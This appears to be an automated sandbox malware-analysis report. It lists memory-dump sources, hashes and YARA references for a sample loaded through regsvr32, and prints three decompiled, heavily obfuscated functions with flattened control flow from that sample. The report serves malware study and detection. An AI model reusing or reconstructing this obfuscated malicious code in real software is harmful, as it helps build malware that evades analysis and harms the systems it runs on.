GetKeyState.USER32 ref: 1000FF86
GetKeyState.USER32 ref: 1000FF8F
SendMessageA.USER32 ref: 1000FFA5

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: fb4c216abc4c33cb282e021b119ac4542c3b2f6db45558139360cfc9261ccdec
Instruction ID: de176050283294f5fba88da379e0eecc3ccd74c62a8982f524273e82d2dc9d2d
Opcode Fuzzy Hash: fb4c216abc4c33cb282e021b119ac4542c3b2f6db45558139360cfc9261ccdec
Instruction Fuzzy Hash: 3BF0827B38025B26FA20B2748C41FBA9154CF86BD0F120538FA42EA5DECF91D8022271

Uniqueness

Uniqueness Score: -1.00%

Function 04B500EF, Relevance: 5.3, Strings: 4, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E04B500EF(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				void* _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				unsigned int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _t303;
				void* _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t370;
				signed int* _t373;

				_t373 =  &_v1692;
				_v1576 = 0xe8da59;
				asm("stosd");
				_t316 = __ecx;
				_t318 = 0x5a;
				asm("stosd");
				_t370 = 0x219adc7;
				asm("stosd");
				_v1592 = 0x4cba20;
				_v1592 = _v1592 / _t318;
				_v1592 = _v1592 ^ 0x000e53d2;
				_v1660 = 0x37da44;
				_v1660 = _v1660 | 0x897b84ec;
				_v1660 = _v1660 >> 7;
				_v1660 = _v1660 ^ 0x011e0d16;
				_v1628 = 0x1c89a1;
				_v1628 = _v1628 | 0x8af6c41c;
				_v1628 = _v1628 ^ 0x8af282b8;
				_v1684 = 0xdb2dca;
				_v1684 = _v1684 | 0x5a04171c;
				_t319 = 0xb;
				_v1684 = _v1684 * 0x1a;
				_v1684 = _v1684 >> 0xb;
				_v1684 = _v1684 ^ 0x000c87cc;
				_v1676 = 0x832ed6;
				_v1676 = _v1676 / _t319;
				_t320 = 5;
				_v1676 = _v1676 / _t320;
				_v1676 = _v1676 ^ 0xed35e4ac;
				_v1676 = _v1676 ^ 0xed379c5b;
				_v1616 = 0xcbfb93;
				_v1616 = _v1616 >> 7;
				_v1616 = _v1616 ^ 0x000d5997;
				_v1688 = 0xe655f9;
				_v1688 = _v1688 + 0xffff9882;
				_t321 = 0x2b;
				_v1688 = _v1688 * 0xb;
				_v1688 = _v1688 * 0x5b;
				_v1688 = _v1688 ^ 0x83159ef1;
				_v1692 = 0xaa6b82;
				_v1692 = _v1692 | 0xcfd3fae0;
				_v1692 = _v1692 / _t321;
				_v1692 = _v1692 * 0x7a;
				_v1692 = _v1692 ^ 0x4e1b8b3c;
				_v1644 = 0x70af24;
				_v1644 = _v1644 << 5;
				_v1644 = _v1644 | 0xf364d4b3;
				_v1644 = _v1644 ^ 0xff7a96be;
				_v1668 = 0x4a582b;
				_v1668 = _v1668 * 0x66;
				_v1668 = _v1668 << 0xf;
				_v1668 = _v1668 ^ 0x909bc222;
				_v1636 = 0x31215f;
				_v1636 = _v1636 ^ 0x6923b039;
				_t322 = 0x29;
				_v1636 = _v1636 / _t322;
				_v1636 = _v1636 ^ 0x029cf3aa;
				_v1652 = 0x9b2524;
				_t323 = 0x38;
				_v1652 = _v1652 / _t323;
				_v1652 = _v1652 ^ 0x48c3dfd8;
				_v1652 = _v1652 ^ 0x48c1ce16;
				_v1608 = 0x82759;
				_v1608 = _v1608 >> 9;
				_v1608 = _v1608 ^ 0x000ff1e7;
				_v1580 = 0x9cb9ac;
				_v1580 = _v1580 + 0xffffe541;
				_v1580 = _v1580 ^ 0x0099fe2e;
				_v1648 = 0xf0b12f;
				_v1648 = _v1648 >> 3;
				_v1648 = _v1648 >> 0xc;
				_v1648 = _v1648 ^ 0x000b1180;
				_v1680 = 0x5a67b4;
				_t324 = 0x1f;
				_v1680 = _v1680 / _t324;
				_t325 = 0x30;
				_v1680 = _v1680 * 0x62;
				_v1680 = _v1680 / _t325;
				_v1680 = _v1680 ^ 0x000c0a94;
				_v1656 = 0x7af90a;
				_v1656 = _v1656 >> 0x10;
				_v1656 = _v1656 ^ 0xd48e11dc;
				_v1656 = _v1656 ^ 0xd48f85db;
				_v1664 = 0xc7c49c;
				_v1664 = _v1664 ^ 0x0b3147da;
				_v1664 = _v1664 ^ 0x91b20725;
				_v1664 = _v1664 ^ 0x9a45c1a7;
				_v1584 = 0x3444f6;
				_v1584 = _v1584 << 2;
				_v1584 = _v1584 ^ 0x00d71217;
				_v1624 = 0x130de1;
				_t326 = 0x58;
				_v1624 = _v1624 / _t326;
				_v1624 = _v1624 ^ 0x000fc6c7;
				_v1588 = 0xc870d9;
				_v1588 = _v1588 >> 7;
				_v1588 = _v1588 ^ 0x00060dd4;
				_v1600 = 0xa62b50;
				_v1600 = _v1600 | 0x0b3ea590;
				_v1600 = _v1600 ^ 0x0bb32963;
				_v1640 = 0x5829fa;
				_v1640 = _v1640 >> 0x10;
				_v1640 = _v1640 * 7;
				_v1640 = _v1640 ^ 0x000c8c8e;
				_v1620 = 0x9954e5;
				_v1620 = _v1620 | 0x46050794;
				_v1620 = _v1620 ^ 0x46999c00;
				_v1672 = 0x8b6b4f;
				_v1672 = _v1672 ^ 0x051743d3;
				_v1672 = _v1672 + 0x5fbf;
				_v1672 = _v1672 * 0x44;
				_v1672 = _v1672 ^ 0x7d983568;
				_v1596 = 0x4b105f;
				_v1596 = _v1596 ^ 0x074c3e20;
				_v1596 = _v1596 ^ 0x0709a291;
				_v1632 = 0x867cf1;
				_v1632 = _v1632 + 0x5758;
				_v1632 = _v1632 << 0xb;
				_v1632 = _v1632 ^ 0x36a3bfa7;
				_v1604 = 0x1e01e;
				_t327 = 0x6d;
				_v1604 = _v1604 / _t327;
				_v1604 = _v1604 ^ 0x000451f9;
				_v1612 = 0x51328f;
				_t328 = 0x66;
				_t303 = _v1612 / _t328;
				_v1612 = _t303;
				_v1612 = _v1612 ^ 0x000ccfe8;
				while(_t370 != 0x219adc7) {
					if(_t370 == 0x472b880) {
						_push(_t328);
						__eflags = 0;
						return E04B485FF(_v1596, _v1632, 0, 0, 0,  &_v1560, _v1604, 0, _v1612);
					}
					_t379 = _t370 - 0x6430241;
					if(_t370 != 0x6430241) {
						L7:
						__eflags = _t370 - 0xc99ad3;
						if(__eflags != 0) {
							continue;
						} else {
							return _t303;
						}
						L10:
						return _t303;
					}
					E04B50DB1(_v1592,  &_v1040, _t379, _v1660, _t328, _v1628);
					 *((short*)(E04B409DD(_v1684,  &_v1040, _v1676, _v1616))) = 0;
					L04B3BAA9(_v1688, _v1692, _t379, _v1644, _v1668,  &_v520);
					_push(_v1580);
					_push(_v1608);
					_push(_v1652);
					E04B52D0A(_v1680, _t379,  &_v520, _v1656, _v1664, _v1584, 0x4b318bc,  &_v1560,  &_v1040, E04B4E1F8(0x4b318bc, _v1636, _t379));
					E04B4FECB(_t310, _v1624, _v1588, _v1600, _v1640);
					_t328 = _v1620;
					_t303 = E04B3BFBE( &_v1560, _t316, _v1672);
					_t373 =  &(_t373[0x18]);
					if(_t303 != 0) {
						_t370 = 0x472b880;
						continue;
					}
					goto L10;
				}
				_t370 = 0x6430241;
				goto L7;
			}

0x04b500ef
0x04b500f5
0x04b5010c
0x04b5010d
0x04b50111
0x04b50114
0x04b50115
0x04b5011a
0x04b5011b
0x04b5012b
0x04b5012f
0x04b50137
0x04b5013f
0x04b50147
0x04b5014c
0x04b50154
0x04b5015c
0x04b50164
0x04b5016c
0x04b50174
0x04b50181
0x04b50184
0x04b50188
0x04b5018d
0x04b50195
0x04b501a5
0x04b501ad
0x04b501b2
0x04b501b8
0x04b501c0
0x04b501c8
0x04b501d0
0x04b501d5
0x04b501dd
0x04b501e5
0x04b501f2
0x04b501f3
0x04b501fc
0x04b50200
0x04b50208
0x04b50210
0x04b5021e
0x04b50227
0x04b5022b
0x04b50233
0x04b5023b
0x04b50240
0x04b50248
0x04b50250
0x04b5025d
0x04b50261
0x04b50266
0x04b5026e
0x04b50276
0x04b50286
0x04b5028b
0x04b50291
0x04b50299
0x04b502a5
0x04b502aa
0x04b502b0
0x04b502b8
0x04b502c0
0x04b502c8
0x04b502cd
0x04b502d5
0x04b502e0
0x04b502eb
0x04b502f6
0x04b502fe
0x04b50303
0x04b50308
0x04b50310
0x04b5031c
0x04b50321
0x04b5032c
0x04b5032f
0x04b5033b
0x04b5033f
0x04b50347
0x04b5034f
0x04b50354
0x04b5035c
0x04b50364
0x04b5036c
0x04b50374
0x04b5037c
0x04b50384
0x04b5038f
0x04b50397
0x04b503a2
0x04b503ae
0x04b503b1
0x04b503b5
0x04b503bd
0x04b503c5
0x04b503ca
0x04b503d2
0x04b503da
0x04b503e2
0x04b503ea
0x04b503f2
0x04b503fc
0x04b50400
0x04b50408
0x04b50410
0x04b50418
0x04b50420
0x04b50428
0x04b50430
0x04b5043d
0x04b50441
0x04b50449
0x04b50451
0x04b5045b
0x04b50468
0x04b50475
0x04b5047d
0x04b50482
0x04b5048a
0x04b50498
0x04b5049d
0x04b504a3
0x04b504ab
0x04b504b7
0x04b504b8
0x04b504ba
0x04b504be
0x04b504c6
0x04b504d4
0x04b505e9
0x04b505ee
0x00000000
0x04b5060f
0x04b504da
0x04b504dc
0x04b505db
0x04b505db
0x04b505e1
0x00000000
0x00000000
0x00000000
0x00000000
0x04b5061c
0x04b5061c
0x04b5061c
0x04b504f9
0x04b50518
0x04b50533
0x04b50538
0x04b50544
0x04b5054b
0x04b5058e
0x04b505ae
0x04b505b7
0x04b505c6
0x04b505cb
0x04b505d0
0x04b505d2
0x00000000
0x04b505d2
0x00000000
0x04b505d0
0x04b505d9
0x00000000

Strings

XW, xrefs: 04B50475
_!1, xrefs: 04B5026E
+XJ, xrefs: 04B50250
$P, xrefs: 04B50101

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$+XJ$XW$_!1
API String ID: 0-3524045022
Opcode ID: 12f1ea32d14992897a3274af91536ae2d41f155a976688dcc000ee3f576dd9e4
Instruction ID: abd58d656c77bf62bb7a350800bb1b02acd03a02eff37d8364a894e4c88c1031
Opcode Fuzzy Hash: 12f1ea32d14992897a3274af91536ae2d41f155a976688dcc000ee3f576dd9e4
Instruction Fuzzy Hash: F6D102715093809FD368CF25C98AA5BFBF2FBC4748F108A1DF59996260D7B19908CF42

Uniqueness

Uniqueness Score: -1.00%

Function 04B380C0, Relevance: 5.3, Strings: 4, Instructions: 261
COMMONCrypto

Download Yara Rule

C-Code - Quality: 74%

			E04B380C0(intOrPtr* __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				unsigned int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				unsigned int _v168;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				unsigned int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				signed int _v220;
				signed int _v224;
				void* _t254;
				void* _t262;
				intOrPtr _t274;
				intOrPtr _t275;
				intOrPtr* _t276;
				void* _t301;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				intOrPtr _t314;
				void* _t315;
				intOrPtr _t318;
				signed int* _t319;

				_t276 = __ecx;
				_t319 =  &_v224;
				_v180 = 0xc71c90;
				_v180 = _v180 * 0x55;
				_t315 = 0xb85ea37;
				_v180 = _v180 + 0xffff2ba7;
				_v180 = _v180 ^ 0x4211e203;
				_v140 = 0x3ad325;
				_v140 = _v140 ^ 0x295262d9;
				_v140 = _v140 ^ 0x29635001;
				_v136 = 0xed3dcc;
				_t307 = 0x6e;
				_v172 = __ecx;
				_v136 = _v136 * 0x41;
				_v136 = _v136 ^ 0x3c3e3c90;
				_v168 = 0x802272;
				_v168 = _v168 + 0x3a4b;
				_v168 = _v168 >> 4;
				_v168 = _v168 ^ 0x0009cc0d;
				_v144 = 0x950525;
				_v144 = _v144 >> 0xb;
				_v144 = _v144 ^ 0x0000417f;
				_v132 = 0xde9c46;
				_v132 = _v132 | 0x6a28fd38;
				_v132 = _v132 ^ 0x6afd2d29;
				_v152 = 0x89fdc2;
				_v152 = _v152 + 0xffff27d1;
				_v152 = _v152 / _t307;
				_v152 = _v152 ^ 0x00002723;
				_v208 = 0xb8ba68;
				_t308 = 0x59;
				_v208 = _v208 / _t308;
				_v208 = _v208 | 0x82dd863f;
				_t309 = 0x24;
				_v208 = _v208 / _t309;
				_v208 = _v208 ^ 0x03ab2b52;
				_v200 = 0x881ce0;
				_t310 = 0x22;
				_v200 = _v200 / _t310;
				_v200 = _v200 >> 6;
				_v200 = _v200 + 0x7e14;
				_v200 = _v200 ^ 0x000ee7c7;
				_v216 = 0xe9a9fc;
				_v216 = _v216 >> 0xa;
				_v216 = _v216 * 0x7c;
				_v216 = _v216 >> 3;
				_v216 = _v216 ^ 0x000159fc;
				_v148 = 0xc6b5e0;
				_v148 = _v148 >> 8;
				_v148 = _v148 ^ 0x0008baff;
				_v192 = 0x70df9a;
				_v192 = _v192 | 0xc7ad4485;
				_v192 = _v192 << 0xe;
				_v192 = _v192 * 0x6c;
				_v192 = _v192 ^ 0x95ca127f;
				_v164 = 0x9f9928;
				_v164 = _v164 + 0x9182;
				_v164 = _v164 | 0x4431d27d;
				_v164 = _v164 ^ 0x44b31704;
				_v156 = 0x8a7155;
				_v156 = _v156 ^ 0x4b85dc4d;
				_v156 = _v156 << 3;
				_v156 = _v156 ^ 0x587c4d22;
				_v184 = 0xc4c18b;
				_v184 = _v184 ^ 0x011789e6;
				_v184 = _v184 | 0x4a7cbaeb;
				_v184 = _v184 ^ 0x4bf1fe8b;
				_v160 = 0x793715;
				_v160 = _v160 | 0xbf52a4ae;
				_v160 = _v160 ^ 0x0f7ea677;
				_v160 = _v160 ^ 0xb008de62;
				_v212 = 0x3fdf0f;
				_v212 = _v212 + 0xffffd1fd;
				_t311 = 7;
				_t318 = _v172;
				_v212 = _v212 * 0x1c;
				_v212 = _v212 >> 5;
				_v212 = _v212 ^ 0x0033b954;
				_v220 = 0x4e6c7b;
				_v220 = _v220 >> 4;
				_t275 = _v172;
				_v220 = _v220 / _t311;
				_v220 = _v220 + 0x72d0;
				_v220 = _v220 ^ 0x000bd6ae;
				_v176 = 0xb64387;
				_v176 = _v176 + 0xffff3763;
				_v176 = _v176 >> 0x10;
				_v176 = _v176 ^ 0x000cc814;
				_v224 = 0xc05028;
				_v224 = _v224 + 0xffff6137;
				_v224 = _v224 >> 1;
				_v224 = _v224 ^ 0x7bfc229c;
				_v224 = _v224 ^ 0x7ba9fc4e;
				_v188 = 0xb7ebf2;
				_v188 = _v188 >> 9;
				_v188 = _v188 ^ 0x513bd66b;
				_t312 = 0x35;
				_v188 = _v188 * 0x6b;
				_v188 = _v188 ^ 0xf3ed84ff;
				_v196 = 0x918e67;
				_v196 = _v196 >> 0xb;
				_v196 = _v196 / _t312;
				_t313 = 0x12;
				_t314 = _v172;
				_v196 = _v196 / _t313;
				_v196 = _v196 ^ 0x000cd5f1;
				_v204 = 0xbd465b;
				_v204 = _v204 ^ 0x40a0ad4b;
				_v204 = _v204 * 0x5a;
				_v204 = _v204 >> 6;
				_v204 = _v204 ^ 0x022df88e;
				while(1) {
					L1:
					_t254 = 0x58c5d57;
					do {
						while(_t315 != 0x26b32e) {
							if(_t315 == _t254) {
								_push(_v160);
								_push(_v184);
								_push(_v156);
								_t262 = E04B4E1F8(0x4b31738, _v164, __eflags);
								_push(_t314);
								_push( &_v128);
								_push(_t262);
								_push(_t318);
								_push(_t275);
								 *((intOrPtr*)(E04B531AA(0xb00b1257, 0x44)))();
								E04B4FECB(_t262, _v212, _v220, _v176, _v224);
								_t319 =  &(_t319[0xb]);
								_t315 = 0x5b11858;
								goto L12;
							} else {
								if(_t315 == 0x5b11858) {
									L04B52B09(_v188, _t314, _v196, _v204);
								} else {
									if(_t315 == 0xa9c05ca) {
										_t314 = L04B50A64( *((intOrPtr*)(_t276 + 4)),  *_t276, _v152, _v208);
										__eflags = _t314;
										if(__eflags != 0) {
											_t315 = 0xed0de4e;
											L12:
											_t276 = _v172;
											goto L1;
										}
									} else {
										if(_t315 == 0xb85ea37) {
											_t315 = 0x26b32e;
											continue;
										} else {
											if(_t315 != 0xed0de4e) {
												goto L15;
											} else {
												_t318 = 0x4000;
												_push(_t276);
												_push(_t276);
												_t274 = E04B3C5D8(0x4000);
												_t276 = _v172;
												_t275 = _t274;
												_t319 =  &(_t319[3]);
												_t254 = 0x58c5d57;
												_t315 =  !=  ? 0x58c5d57 : 0x5b11858;
												continue;
											}
										}
									}
								}
							}
							L18:
							return _t275;
						}
						_push(_t276);
						_push(_t276);
						_t318 = E04B4CCA0(1, 0x10);
						_push( &_v128);
						_push(_t318);
						_push(_v132);
						_t301 = 0xb;
						E04B3E404(_v144, _t301);
						_t276 = _v172;
						_t319 =  &(_t319[7]);
						_t315 = 0xa9c05ca;
						_t254 = 0x58c5d57;
						L15:
						__eflags = _t315 - 0x7f64d40;
					} while (__eflags != 0);
					goto L18;
				}
			}

0x04b380c0
0x04b380c0
0x04b380c6
0x04b380d9
0x04b380dd
0x04b380e2
0x04b380ea
0x04b380f2
0x04b380fa
0x04b38102
0x04b3810a
0x04b38119
0x04b3811c
0x04b38120
0x04b38124
0x04b3812c
0x04b38134
0x04b3813c
0x04b38141
0x04b38149
0x04b38151
0x04b38156
0x04b3815e
0x04b38166
0x04b3816e
0x04b38176
0x04b3817e
0x04b3818e
0x04b38192
0x04b3819a
0x04b381a6
0x04b381ab
0x04b381b1
0x04b381bd
0x04b381c2
0x04b381c8
0x04b381d0
0x04b381dc
0x04b381df
0x04b381e3
0x04b381e8
0x04b381f0
0x04b381f8
0x04b38200
0x04b3820a
0x04b3820e
0x04b38213
0x04b3821b
0x04b38223
0x04b38228
0x04b38230
0x04b38238
0x04b38240
0x04b3824a
0x04b3824e
0x04b38256
0x04b3825e
0x04b38266
0x04b3826e
0x04b38276
0x04b38280
0x04b38288
0x04b3828d
0x04b38295
0x04b3829d
0x04b382a5
0x04b382ad
0x04b382b5
0x04b382bd
0x04b382c5
0x04b382cd
0x04b382d5
0x04b382dd
0x04b382ec
0x04b382ef
0x04b382f3
0x04b382f7
0x04b382fc
0x04b38304
0x04b3830c
0x04b38319
0x04b3831d
0x04b38321
0x04b38329
0x04b38331
0x04b38339
0x04b38341
0x04b38346
0x04b3834e
0x04b38356
0x04b3835e
0x04b38362
0x04b3836a
0x04b38372
0x04b3837a
0x04b3837f
0x04b3838c
0x04b3838f
0x04b38393
0x04b3839b
0x04b383a3
0x04b383b0
0x04b383b8
0x04b383bb
0x04b383bf
0x04b383c3
0x04b383cb
0x04b383d3
0x04b383e0
0x04b383e4
0x04b383e9
0x04b383f1
0x04b383f1
0x04b383f1
0x04b383f6
0x04b383f6
0x04b38404
0x04b3849c
0x04b384a5
0x04b384a9
0x04b384b1
0x04b384c4
0x04b384c5
0x04b384c6
0x04b384c7
0x04b384c8
0x04b384d1
0x04b384e5
0x04b384ea
0x04b384ed
0x00000000
0x04b3840a
0x04b38410
0x04b3855a
0x04b38416
0x04b3841c
0x04b38482
0x04b38486
0x04b38488
0x04b3848e
0x04b38493
0x04b38493
0x00000000
0x04b38493
0x04b3841e
0x04b38424
0x04b38469
0x00000000
0x04b38426
0x04b3842c
0x00000000
0x04b38432
0x04b38436
0x04b38447
0x04b38448
0x04b3844a
0x04b3844f
0x04b38453
0x04b38455
0x04b3845f
0x04b38464
0x00000000
0x04b38464
0x04b3842c
0x04b38424
0x04b3841c
0x04b38410
0x04b38564
0x04b3856d
0x04b3856d
0x04b38504
0x04b38505
0x04b3850f
0x04b38518
0x04b38519
0x04b3851a
0x04b38527
0x04b38528
0x04b3852d
0x04b38531
0x04b38534
0x04b38539
0x04b3853e
0x04b3853e
0x04b3853e
0x00000000
0x04b3854a

Strings

"M|X, xrefs: 04B3828D
#', xrefs: 04B38192
{lN, xrefs: 04B38304
K:, xrefs: 04B38134

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "M|X$#'$K:${lN
API String ID: 0-1886388755
Opcode ID: 07d60774760b816f161188bbd8103d94534140a1e7055cb21a78a454c292fd09
Instruction ID: cc8e98ca7d137d2b13383396c903a7d0a6dd46ddf112ccfb66e5c5ac836a784e
Opcode Fuzzy Hash: 07d60774760b816f161188bbd8103d94534140a1e7055cb21a78a454c292fd09
Instruction Fuzzy Hash: B3C12E725083809FC358DE2AC48A90BFBE1FBD4758F10896DF99596260D3B5E949CF83

Uniqueness

Uniqueness Score: -1.00%

Function 04B52D53, Relevance: 5.2, Strings: 4, Instructions: 221
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E04B52D53(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t237;
				intOrPtr _t238;
				intOrPtr _t239;
				void* _t243;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				void* _t267;
				void* _t268;
				signed int* _t271;
				signed int* _t272;

				_t271 =  &_v104;
				_v4 = _v4 & 0x00000000;
				_v12 = 0xb3680a;
				_v8 = 0x44a7b2;
				_v84 = 0x16e473;
				_v84 = _v84 | 0xff7fd6cb;
				_v84 = _v84 << 0xe;
				_v84 = _v84 ^ 0xfdb25567;
				_v88 = 0x1491df;
				_v88 = _v88 | 0x25bec09f;
				_v88 = _v88 + 0xf90e;
				_v88 = _v88 << 0x10;
				_v88 = _v88 ^ 0xcae39943;
				_v92 = 0xaddb4a;
				_v92 = _v92 ^ 0x38a1add8;
				_t267 = __edx;
				_t243 = __ecx;
				_t245 = 0x27;
				_t268 = 0x72ed85;
				_v92 = _v92 / _t245;
				_t246 = 0x26;
				_v92 = _v92 * 0x56;
				_v92 = _v92 ^ 0x7b991acf;
				_v36 = 0x41254;
				_v36 = _v36 ^ 0x82dbc96b;
				_v36 = _v36 ^ 0x82dd2337;
				_v28 = 0x754151;
				_v28 = _v28 + 0x3d65;
				_v28 = _v28 ^ 0x0076627a;
				_v76 = 0xa9aca8;
				_v76 = _v76 * 0x46;
				_v76 = _v76 << 0x10;
				_v76 = _v76 * 0x71;
				_v76 = _v76 ^ 0xcef7d733;
				_v80 = 0x19ef1d;
				_v80 = _v80 + 0x4807;
				_v80 = _v80 >> 0x10;
				_t247 = 9;
				_v80 = _v80 / _t246;
				_v80 = _v80 ^ 0x000e4732;
				_v32 = 0xb4891b;
				_v32 = _v32 | 0x91ee1565;
				_v32 = _v32 ^ 0x91f206c4;
				_v52 = 0xb65ed8;
				_v52 = _v52 ^ 0x53a92618;
				_v52 = _v52 * 0x77;
				_v52 = _v52 ^ 0xa3a75cc7;
				_v20 = 0xeecfa7;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x3bb2e2c4;
				_v72 = 0xfbd7a5;
				_v72 = _v72 ^ 0x9f68e208;
				_v72 = _v72 << 8;
				_v72 = _v72 | 0x30258995;
				_v72 = _v72 ^ 0xb3385db1;
				_v24 = 0x1aaffc;
				_v24 = _v24 * 0x36;
				_v24 = _v24 ^ 0x05ac1646;
				_v16 = 0xb69c42;
				_v16 = _v16 + 0x3887;
				_v16 = _v16 ^ 0x00b1c7d8;
				_v44 = 0x5789e3;
				_v44 = _v44 / _t247;
				_v44 = _v44 + 0xffffe7e6;
				_v44 = _v44 ^ 0x00087fde;
				_v68 = 0x94873;
				_v68 = _v68 << 0xf;
				_v68 = _v68 + 0xffff48e1;
				_v68 = _v68 ^ 0x69c9ade9;
				_v68 = _v68 ^ 0xcdf62ffc;
				_v48 = 0x208212;
				_v48 = _v48 | 0x39c03c72;
				_v48 = _v48 >> 0xc;
				_v48 = _v48 ^ 0x0008cd3c;
				_v96 = 0x3b2be3;
				_v96 = _v96 ^ 0x07755c49;
				_v96 = _v96 >> 0xf;
				_v96 = _v96 ^ 0x076fdb2f;
				_v96 = _v96 ^ 0x07616547;
				_v100 = 0xac4dde;
				_v100 = _v100 + 0x3900;
				_t248 = 0x42;
				_v100 = _v100 * 0x54;
				_v100 = _v100 ^ 0x672a87d3;
				_v100 = _v100 ^ 0x5fb939da;
				_v104 = 0x9fab94;
				_v104 = _v104 ^ 0x81ae57b6;
				_v104 = _v104 | 0x48b65982;
				_v104 = _v104 * 0x3c;
				_v104 = _v104 ^ 0x471b6d30;
				_v56 = 0x9acae2;
				_v56 = _v56 << 3;
				_v56 = _v56 >> 0xf;
				_v56 = _v56 ^ 0x000181ed;
				_v60 = 0x9f5509;
				_v60 = _v60 / _t248;
				_v60 = _v60 >> 3;
				_v60 = _v60 + 0xfffff221;
				_v60 = _v60 ^ 0x000ffb1e;
				_v40 = 0x6ff3a2;
				_v40 = _v40 << 9;
				_v40 = _v40 + 0x9f22;
				_v40 = _v40 ^ 0xdfef744e;
				_v64 = 0xeafe6e;
				_v64 = _v64 ^ 0x9deccfb6;
				_v64 = _v64 << 0xf;
				_v64 = _v64 * 0x79;
				_v64 = _v64 ^ 0xc780890d;
				while(1) {
					L1:
					_t237 = 0xd8fe181;
					do {
						L2:
						while(_t268 != 0x72ed85) {
							if(_t268 == 0xb6c7232) {
								_t263 = _v44;
								_t248 = _v16;
								_t238 = E04B51005(_v16, _v44, _v68, _v48,  *((intOrPtr*)(_t267 + 0x38)));
								_t271 =  &(_t271[3]);
								 *((intOrPtr*)(_t267 + 0x2c)) = _t238;
								__eflags = _t238;
								_t237 = 0xd8fe181;
								_t268 =  !=  ? 0xd8fe181 : 0xd6f812a;
								continue;
							}
							if(_t268 == 0xc5020c9) {
								_push(_v36);
								_t239 = L04B53263(_v84, _v88, __eflags, _t243, _v92, _t248);
								_t272 =  &(_t271[4]);
								 *((intOrPtr*)(_t267 + 0x38)) = _t239;
								__eflags = _t239;
								if(_t239 != 0) {
									E04B5148A(_t239, _t239, _v28, _v76, _v80, _v32);
									_t263 = _v20;
									_t248 = _v52;
									L04B3E2BD(_v20, _v72,  *((intOrPtr*)(_t267 + 0x38)), _v24);
									_t271 =  &(_t272[7]);
									_t268 = 0xb6c7232;
									goto L1;
								}
							} else {
								if(_t268 == 0xd6f812a) {
									return E04B3F0E9(_v60,  *((intOrPtr*)(_t267 + 0x38)), _v40, _v64);
								}
								if(_t268 != _t237) {
									goto L13;
								} else {
									_t239 = E04B40EBC(_v96, _t263, _v100, _v96, _v104, _v56, _v96, _t248, _t267, 0x4b4a2a5);
									_t271 =  &(_t271[8]);
									 *((intOrPtr*)(_t267 + 0x48)) = _t239;
									if(_t239 == 0) {
										_t268 = 0xd6f812a;
										while(1) {
											L1:
											_t237 = 0xd8fe181;
											goto L2;
										}
									}
								}
							}
							return _t239;
						}
						_t268 = 0xc5020c9;
						L13:
						__eflags = _t268 - 0x11d9bb5;
					} while (__eflags != 0);
					return _t237;
				}
			}

0x04b52d53
0x04b52d56
0x04b52d5b
0x04b52d63
0x04b52d6b
0x04b52d73
0x04b52d7b
0x04b52d80
0x04b52d88
0x04b52d90
0x04b52d98
0x04b52da0
0x04b52da5
0x04b52dad
0x04b52db5
0x04b52dc7
0x04b52dc9
0x04b52dcb
0x04b52dce
